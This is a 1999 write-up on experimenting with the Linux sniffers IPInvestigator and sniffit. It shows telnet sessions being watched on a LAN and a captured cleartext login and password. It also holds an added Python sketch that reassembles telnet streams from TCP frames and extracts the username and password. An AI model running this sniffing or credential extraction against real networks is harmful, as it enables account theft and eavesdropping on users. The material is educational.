Experimenting with Linux ethernet sniffers

IPInvestigator 1.1, Sniffit.0.3.5

Last updated: 21st of March 1999.

The vulnerability was analyzed by:
Johannes Kleimola, Johannes.Kleimola@hut.fi


IPInvestigator 1.1

Version 1.1, written by Jeff Thompson

IPInvestigator consists of two separate programs, List and Watch. With the first one you can take a snapshot (not a real-time view) of the connections currently seen on the wire and have them printed on stdout with IP addresses and ports. Let's take a look.

[root@parittaja IPI]# ./List eth0 10
Up and running. Collect them NFO'Z
0: src:10.0.0.81 22 dst:10.0.0.254 1019
1: src:10.0.0.91 23 dst:10.0.0.81 26241
2: src:10.0.0.81 26241 dst:10.0.0.91 23
3: src:10.0.0.254 1019 dst:10.0.0.81 22
4: src:10.0.0.254 1020 dst:10.0.0.61 22
5: src:10.0.0.61 22 dst:10.0.0.254 1020
Found 6 unique connections.
[root@parittaja IPI]#
As can be seen, there are a couple of ssh connections (port 22) and one telnet connection (port 23) going; List counts each direction separately, which is why three connections show up as six entries. Since ssh is encrypted, we are only interested in the latter one. With Watch you can pick one of the connections (by specifying source IP, destination IP, source port and destination port, in that order, with the IP octets separated by spaces instead of dots) and watch it in real time printed on stdout. I'll pick the server-to-client direction, so we'll see everything that is happening on the user's screen.
[root@parittaja IPI]# ./Watch eth0 10 0 0 91 10 0 0 81 23 26241
Up and running. Collect them NFO'Z
ls^M^M
files       letter.txt  mail^M^M
# ls -al^M^M
total 10^M^M
drwxr-xr-x   4 1017     other        512 Mar 20 01:41 .^M^M
drwxr-xr-x  29 root     other        512 Mar 16 21:20 ..^M^M
drwxr-xr-x   2 root     other        512 Mar 20 01:26 files^M^M
-rw-r--r--   1 root     other         78 Mar 20 01:41 letter.txt^M^M
drwxr-xr-x   2 root     other        512 Mar 20 01:25 mail^M^M
# ps^M^M
   PID TTY      TIME CMD^M^M
 16442 pts/1    0:00 ps^M^M
  1600 pts/1    0:01 sh^M^M
# cd ..^M^M
# pwd^M^M
/home2^M^M
# telnet rikas^M^M
rikas: Unknown host^M^M
# telnet 10.0.0.81^M^M
Trying 10.0.0.81...^M^M
Connected to 10.0.0.81.^M^M
Escape character is '^]'.^M^M
^M^M
Red Hat Linux release 5.2 (Apollo)^M^M
Kernel 2.0.36 on an i686^M^M
login: jj^M^M
Password: ^M^M
Last login: Sat Mar 20 01:47:04 from localhost^M^M
[jj@rikas ~]$ exit^M
logout^M^M
Connection closed by foreign host.^M^M
#
[root@parittaja IPI]#
This time we saw everything the user did, but not his password: the server does not echo it back to the user, so it never appears in the server-to-client stream. For the password we would have had to pick the client-to-server direction of the telnet connection.

IPInvestigator compiles fine on an old RedHat 4.2 (libc5) system, but requires changes to compile on newer systems.

Sniffit.0.3.5

by Brecht Claerhout

Sniffit is one of the most famous and best ethernet sniffers for Linux. You can run it either from the command line (with several configuration options, optional filters and plug-ins) or in interactive mode. Below is a short telnet session we'll track later with sniffit.

# telnet 10.0.0.81
Trying 10.0.0.81...
Connected to 10.0.0.81.
Escape character is '^]'.

Red Hat Linux release 5.2 (Apollo)
Kernel 2.0.36 on an i686
login: jj
Password:
Last login: Sun Mar 21 22:01:34 from rakas
[jj@rikas ~]$ ls -al^M^M
total 14
drwx------   4 jj       jj           1024 Mar 21 21:56 .
drwxr-xr-x  37 root     root         1024 Mar 20 02:27 ..
-rw-------   1 jj       jj            210 Mar 20 01:47 .Xauthority
-rw-r--r--   1 jj       jj           1155 Mar 17 20:46 .Xdefaults
-rw-------   1 jj       jj           2918 Mar 20 01:51 .bash_history
-rw-r--r--   1 jj       jj             24 Mar 17 20:46 .bash_logout
-rw-r--r--   1 jj       jj            230 Mar 17 20:46 .bash_profile
-rw-r--r--   1 jj       jj            124 Mar 17 20:46 .bashrc
drwxr-xr-x   2 jj       jj           1024 Mar 18 00:43 .ssh
-rw-rw-r--   1 jj       jj            121 Mar 21 21:57 dead.letter
drwxrwxr-x   2 jj       jj           1024 Mar 21 21:56 mail
[jj@rikas ~]$ exit^M^M
logout
Connection closed by foreign host.
#

In interactive mode sniffit gives you a nice ncurses window with some configuration options; those are stripped from the outputs below. The window shows the ongoing connections in real time, and you can select one for interactive logging with the up and down arrows and Enter. Here's an example of ongoing connections; we'll pick a telnet session again.
        10.0.0.61    22  ->        10.0.0.81  1021
        10.0.0.81    22  ->       10.0.0.254  1019
       10.0.0.254  1022  ->        10.0.0.81    22
        10.0.0.81  1023  ->        10.0.0.91   513
        10.0.0.91 34483  ->        10.0.0.81    23           *LOGGED*
        10.0.0.81    23  ->        10.0.0.91 34483
        10.0.0.91   513  ->        10.0.0.81  1023
        10.0.0.81    22  ->       10.0.0.254  1022
       10.0.0.254  1019  ->        10.0.0.81    22
        10.0.0.81  1021  ->        10.0.0.61    22
Logging a connection gives you a real-time view showing every printable character (non-printable bytes such as CR and LF show up as dots). This time I picked the client-to-server direction, so we only see what the user typed. But that gives us what we want: the username and the password (the first two 'words').
jj..t00s1mple..ls -al..exit

 10.0.0.91 34483  ->        10.0.0.81    23
Even though the interactive mode is good for getting an overview of the connections and maybe for administrative monitoring, the real strength of sniffit is in its command-line controls and logging. You can specify what is logged and how, and even use filters (configuration files) and plug-ins for filtering/printing (a nice dns plug-in ships with sniffit).
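To make concrete what both tools do above (List's table of unidirectional flows and Watch's one-direction dump in the IPInvestigator section, and sniffit's logging of the client-to-server telnet stream in this one), here is an added Python sketch of the same reconstruction. It is not code from IPInvestigator, sniffit or the author of this page. The capture it works on is constructed inline from hypothetical frames modelled on the sessions shown (the login name jj, the password and the 10.0.0.x addresses are taken from the text; MACs, sequence numbers and the ssh bytes are made up), and it assumes no IP fragmentation, no sequence-number wraparound and telnet option sequences that do not straddle two TCP segments.

```python
import struct

ETHERTYPE_IPV4, IPPROTO_TCP = 0x0800, 6
IAC, SE, SB, WILL, DONT = 255, 240, 250, 251, 254  # telnet command bytes

def build_frame(src_ip, src_port, dst_ip, dst_port, seq, payload):
    """Constructed Ethernet/IPv4/TCP frame (checksums left zero; a real wire capture carries valid ones)."""
    eth = bytes(12) + struct.pack("!H", ETHERTYPE_IPV4)
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, 0, 5 << 4, 0x18, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0x4000, 64, IPPROTO_TCP,
                     0, bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return eth + ip + tcp + payload

def build_stream(src_ip, src_port, dst_ip, dst_port, segments, seq=1000):
    """One direction of a connection as in-order TCP segments with running sequence numbers."""
    frames = []
    for seg in segments:
        frames.append(build_frame(src_ip, src_port, dst_ip, dst_port, seq, seg))
        seq += len(seg)
    return frames

def parse_frame(frame):
    """(src_ip, src_port, dst_ip, dst_port, seq, payload) for an IPv4/TCP frame, else None (ARP, UDP, runt)."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
    if ip[0] >> 4 != 4 or ip[9] != IPPROTO_TCP or ihl < 20 or len(ip) < total_len:
        return None
    tcp = ip[ihl:total_len]  # slicing to total_len also drops Ethernet padding
    if len(tcp) < 20:
        return None
    src_port, dst_port, seq = struct.unpack("!HHI", tcp[:8])
    src_ip, dst_ip = (".".join(map(str, ip[o:o + 4])) for o in (12, 16))
    return src_ip, src_port, dst_ip, dst_port, seq, tcp[(tcp[12] >> 4) * 4:]

def list_connections(frames):
    """Like List: every distinct unidirectional flow, so one telnet session appears twice (once per direction)."""
    flows = {}
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is not None:
            flows.setdefault(parsed[:4], None)
    return list(flows)

def strip_telnet_options(data):
    """Drop IAC command sequences (option negotiation) so only user data remains; IAC IAC is a literal 0xFF."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i])
            i += 1
        elif i + 1 >= len(data):  # dangling IAC at end of segment
            break
        elif data[i + 1] == IAC:
            out.append(IAC)
            i += 2
        elif WILL <= data[i + 1] <= DONT:  # WILL/WONT/DO/DONT <option>
            i += 3
        elif data[i + 1] == SB:  # SB <subnegotiation> IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:  # two-byte commands: NOP, GA, AYT, ...
            i += 2
    return bytes(out)

def watch(frames, src_ip, src_port, dst_ip, dst_port):
    """Like Watch / sniffit logging: one direction, segments ordered by seq, retransmissions dropped."""
    key, segments = (src_ip, src_port, dst_ip, dst_port), {}
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is not None and parsed[:4] == key and parsed[5]:
            segments.setdefault(parsed[4], parsed[5])  # first copy of a sequence number wins
    return strip_telnet_options(b"".join(segments[s] for s in sorted(segments)))

def printable_view(data):
    """sniffit-style rendering: CR, LF and other non-printable bytes show up as dots."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data)

def credentials(client_stream):
    """Login name and password: the first two Enter-terminated tokens the client sent."""
    tokens = [t.decode("latin-1") for t in client_stream.replace(b"\r", b"\n").split(b"\n") if t]
    return (tokens[0], tokens[1]) if len(tokens) >= 2 else None

# Constructed sample capture modelled on the sessions in the text (hypothetical frames, not a real trace).
CLIENT = build_stream("10.0.0.91", 34483, "10.0.0.81", 23,
                      [b"\xff\xfd\x01", b"jj\r\n", b"t00s1mple\r\n", b"ls -al\r\n", b"exit\r\n"])
SERVER = build_stream("10.0.0.81", 23, "10.0.0.91", 34483,
                      [b"\xff\xfb\x01login: ", b"jj\r\nPassword: ", b"\r\n[jj@rikas ~]$ "])
SSH = build_stream("10.0.0.254", 1019, "10.0.0.81", 22, [bytes(range(16))])  # opaque ciphertext stand-in
CAPTURE = [SERVER[0], CLIENT[0], CLIENT[1], SERVER[1], CLIENT[2], CLIENT[2], SERVER[2], CLIENT[3], CLIENT[4], SSH[0]]

if __name__ == "__main__":
    for n, (sip, sport, dip, dport) in enumerate(list_connections(CAPTURE)):
        print(f"{n}: src:{sip} {sport} dst:{dip} {dport}")
    typed = watch(CAPTURE, "10.0.0.91", 34483, "10.0.0.81", 23)
    print(printable_view(typed), credentials(typed))
```

Run stand-alone it prints the three flows the way List does, then the client-to-server stream in sniffit's dotted form followed by the recovered login name and password. Watching the reverse direction instead yields the login and password prompts but not the password itself, which is the point made in the IPInvestigator section. Two details the tools above hide but a practitioner has to handle: telnet option negotiation (the 0xFF IAC sequences) is interleaved with keystrokes and would otherwise corrupt the first "word", and the segment seen twice in the sample (a retransmission) must be dropped by sequence number rather than concatenated in arrival order.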

Sniffit compiles fine on both RedHat 4.2 (libc5) and RedHat 5.2 (glibc2).